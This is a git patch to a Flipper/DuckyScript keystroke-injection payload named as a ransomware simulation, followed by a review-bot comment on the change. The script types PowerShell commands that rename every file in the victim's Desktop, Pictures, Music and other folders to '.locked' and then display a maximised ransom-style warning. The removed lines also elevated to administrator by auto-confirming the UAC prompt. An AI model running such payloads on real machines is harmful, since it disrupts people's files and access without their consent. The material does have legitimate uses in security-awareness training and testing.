From 085fd437ff603bf59289857334f6b2b8bc39fd44 Mon Sep 17 00:00:00 2001
From: Mark <148797232+MarkCyber@users.noreply.github.com>
Date: Mon, 20 May 2024 11:30:35 -0400
Subject: [PATCH] Update 1. RansomwareSimulation
---
 1. RansomwareSimulation | 83 +++++++++++++++++++++++++++++------------
 1 file changed, 59 insertions(+), 24 deletions(-)
diff --git a/1. RansomwareSimulation b/1. RansomwareSimulation
index c8d64ec..d9746fe 100644
--- a/1. RansomwareSimulation
+++ b/1. RansomwareSimulation
@@ -1,30 +1,65 @@
-REM #########################################################################################################################
-REM ################ This script was created by github.com/MarkCyber ############
-REM ################ This script is intended to act as a simulation of a ransomware attack ############
-REM ################ This script will change all file extensions to .locked rather than encrypting the files ############
-REM #########################################################################################################################
-
-
-REM Set delay for flipper
-DELAY 500
+REM This script was created by github.com/MarkCyber
+REM This script simulates a ransomware attack by renaming files and displaying a message.
+DELAY 1000
 GUI r
-DELAY 100
-STRING powershell -Command "Start-Process powershell -Verb runAs"
-ENTER
-DELAY 500
-ALT y
-DELAY 500
-
-REM Rename files in specified locations to append .locked to every file
-STRING $locations = @('MyDocuments', 'Desktop', 'Pictures', 'Music'); $errorOccurred = $false; foreach ($loc in $locations) { $path = [Environment]::GetFolderPath($loc); $files = Get-ChildItem -Path $path -File; foreach ($file in $files) { $null = $file | Rename-Item -NewName {$file.Name + '.locked'}; if (-not $?){ $errorOccurred = $true } } }
-STRING IF ($errorOccurred) { exit }
-ENTER
 DELAY 1000
-
+STRING powershell
+ENTER
+DELAY 3000
+REM Define the locations using correct SpecialFolder enumerations
+STRING $folders = @(
+ENTER
+DELAY 500
+STRING [System.Environment+SpecialFolder]::Desktop,
+ENTER
+DELAY 500
+STRING [System.Environment+SpecialFolder]::MyPictures,
+ENTER
+DELAY 500
+STRING [System.Environment+SpecialFolder]::MyMusic,
+ENTER
+DELAY 500
+STRING [System.Environment+SpecialFolder]::Downloads
+ENTER
+DELAY 500
+STRING )
+ENTER
+DELAY 500
+REM Iterate over each location
+STRING foreach ($folder in $folders) {
+ENTER
+DELAY 500
+STRING $path = [Environment]::GetFolderPath($folder)
+ENTER
+DELAY 500
+REM Get all files in the path and rename them
+STRING Get-ChildItem -Path $path -File | ForEach-Object { Rename-Item -Path $_.FullName -NewName ($_.Name + '.locked') }
+ENTER
+DELAY 500
+STRING }
+ENTER
+DELAY 2000
 REM Display ransomware message
-STRING Add-Type -AssemblyName PresentationFramework; $Window = New-Object System.Windows.Window; $Window.WindowStartupLocation = 'CenterScreen'; $Window.WindowState = 'Maximized'; $Window.Topmost = $true; $Window.Content = 'Your files have been encrypted. This is a simulation. Please contact your IT support team.'; $Window.ShowDialog()
+STRING Add-Type -AssemblyName PresentationFramework
 ENTER
-DELAY 1000
-
+DELAY 500
+STRING $Window = New-Object System.Windows.Window
+ENTER
+DELAY 500
+STRING $Window.WindowStartupLocation = 'CenterScreen'
+ENTER
+DELAY 500
+STRING $Window.WindowState = 'Maximized'
+ENTER
+DELAY 500
+STRING $Window.Topmost = $true
+ENTER
+DELAY 500
+STRING $Window.Content = 'Your files have been encrypted. This is a simulation. Please contact your IT support team.'
+ENTER
+DELAY 500
+STRING $Window.ShowDialog()
+ENTER
+DELAY 2000
 STRING exit
 ENTER
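Review bot: `[System.Environment+SpecialFolder]::Downloads` in the `$folders` array is not a member of that enum, so the REM line promising "correct SpecialFolder enumerations" is inaccurate and the element most likely evaluates to `$null`; what `GetFolderPath` and `Get-ChildItem` then do with it is outside what the exercise controls, so the entry should be dropped. The rewrite also removes the old `$errorOccurred` tracking and types the loop one line at a time behind fixed `DELAY 500` pauses, so a failed `Rename-Item` or a focus change mid-run can leave the host partly renamed with nothing recording it. For a simulation the header REM block should document the revert for each folder, for example `Get-ChildItem -Path $path -File -Filter *.locked | Rename-Item -NewName { $_.Name -replace '\.locked$','' }`. Adding `-ErrorAction Stop` to the rename would make the run halt at the first failure instead of continuing silently.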